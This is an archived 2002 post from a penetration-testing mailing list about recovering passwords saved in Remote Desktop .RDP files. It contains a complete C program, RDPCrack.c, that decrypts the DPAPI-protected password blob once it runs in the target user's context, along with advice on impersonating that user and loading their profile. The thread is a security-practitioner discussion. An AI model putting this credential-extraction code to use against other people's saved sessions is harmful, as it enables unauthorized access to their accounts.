Penetration Testing mailing list archives
RE: Saved Terminal Server Sessions
From: "Michael Howard" <mikehow () microsoft com>
Date: Tue, 31 Dec 2002 11:31:34 -0800
You will also need to load the user's profile, simply impersonating may not work... Cheers, Michael Secure Windows Initiative Writing Secure Code 2nd Edition http://www.microsoft.com/mspress/books/5957.asp -----Original Message----- From: Nicolas RUFF [mailto:nicolas.ruff () edelweb fr] Sent: Tuesday, December 31, 2002 2:03 AM To: pen-test st0ff st0ff wrote: > Hi all - > Terminal Server Client or Remote Desktop Client are > providing to save the appropriate user credentials. A > plaintext file is used for that. But the password is > encrypted in there. Is there a tool available to crack > this? Hi, I guess you are talking about ".RDP" files. The password is encrypted using the CryptProtectData() standard API. You can use the code below (from MSDN), to decrypt it ; however you will have to impersonate the user somehow to make this code run, because the encryption key used is derivated from the user context (the Windows logon password I guess). - Nicolas RUFF ----------------------------------- Security Consultant @ EdelWeb nicolas.ruff () edelweb fr ----------------------------------- //-------------------------------------------------------------------- // RDPCrack.c // // This is modified sample code from MSDN // This code requires Windows 2000 or XP // Don't forget to link CRYPT32.LIB // #include <stdio.h> #include <windows.h> #include <wincrypt.h> void HandleError(char *s); void main() { DATA_BLOB DataOut; DATA_BLOB DataVerify; LPWSTR pDescrOut = NULL; BYTE *pbDataOutput; DWORD cbDataOutput; int data; // Put encrypted password string here char szEncodedPwd[] = "01000000D08C9DDF0115D1118C7A00C04FC297EB01000000A5C6A9949D6D804898C5037 8542C8AE40000000008000000700073007700000003660000A8000000100000008038592 82E66C6AFF273047E0D9C1D8A0000000004800000A000000010000000E60DE7216CBEC1F 108E86A1A21D7CDA1080200009878C213C72E84F0777A4D9E0B3F339906618C3F07727A7 9E1E1E923FCF50B3C5514246AD4117ADCFD4CF603AD5EEDA2A1692AFB4CAF32FEE468B6E 6C564FAADFC64E901CE784CA72081DF762B15D498F2C2488F9AAFC271B5B7D1DA2A4AA0B 585605024BCC18141213E6C9CBF3FCB1E2F032693580E63589D4342C8038E289F179147A A85B06462E35F6C2E83C29BCA2EDACC754F76A3D7DAA666EDF5D615036BAE280211B602D 3F931F7AC22C26D5B3C1E7360757FE4CBAF3D5BAD23F1F06A6572F79A81552600E7F4453 5935F3908B6642E382D19FD7072C87174EF4144FA724368827DB7ACAA412242FDC215059 5A43974FF5C3BA18CE764F46C2F783740A6C250FC5F9350A09804C0E776BFE6B9D10F60E 219FC078F02E13F90DD9730FC598EBABE4AAB75C5C64D3A51BB0CC90470AAB85A921384C 929012A60A68BC893D3AA320032836B40D43637789724C2DE79217DA3BA7E77544489049 97DAFBB308EAD210ED51FAF1F8C5ABD6B057F728AE1F836974A1D 58017821C804EB2B1DB3897F7F31247CA55377379F1B05D69F2BDEAC5BE5BFD95E754F4A 69D2301222C72AE2200200092E56C69F66E15913E13B821CA78BEA70DC8CA2F682EFE01E 69B52E6218FE5FB5FAFF0DA7E17257748F1B35F0E3507D7A13146CBDFF6155FEE6B8CEF2 F5CFF1E0D66D0B5D7C4234E07D23319BA1C6317C0CDAA9A80499DD4B57A66886A677E631 744714000000257F2ED4678E73B1D0CF2338B471F6A507A7FE9F0"; // String conversion cbDataOutput = ( (strlen(szEncodedPwd)) / 2 ); pbDataOutput = (BYTE *)malloc( cbDataOutput + 1 ); if (pbDataOutput == NULL) HandleError("Not enough memory."); for (unsigned int i=0; i<(cbDataOutput); i++) { sscanf(&(szEncodedPwd[i+i]), "%02x", &data); pbDataOutput[i] = data; } DataOut.pbData = pbDataOutput; DataOut.cbData = cbDataOutput; // Decryption if (CryptUnprotectData( &DataOut, // [in] Input data &pDescrOut, // (Optional) [out] Description string NULL, // (Optional) [in] Entropy (not used by MS) NULL, // Reserved NULL, // (Optional) PromptStruct 0, // Flags &DataVerify)) // [out] Output data { wprintf(L"The decrypted data is: %s\n", (WCHAR *)DataVerify.pbData); printf("The description of the data was: %S\n", pDescrOut); } else { HandleError("Decryption error!"); } LocalFree(pDescrOut); free(DataOut.pbData); LocalFree(DataVerify.pbData); } void HandleError(char *s) { fprintf(stderr, "An error occurred in running the program. \n"); fprintf(stderr, "%s\n",s); fprintf(stderr, "Error number %x.\n", GetLastError()); fprintf(stderr, "Program terminating. \n"); exit(1); } ------------------------------------------------------------------------ ---- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- Saved Terminal Server Sessions st0ff st0ff (Dec 19)
- <Possible follow-ups>
- Re: Saved Terminal Server Sessions Nicolas RUFF (Dec 31)
- RE: Saved Terminal Server Sessions Michael Howard (Dec 31)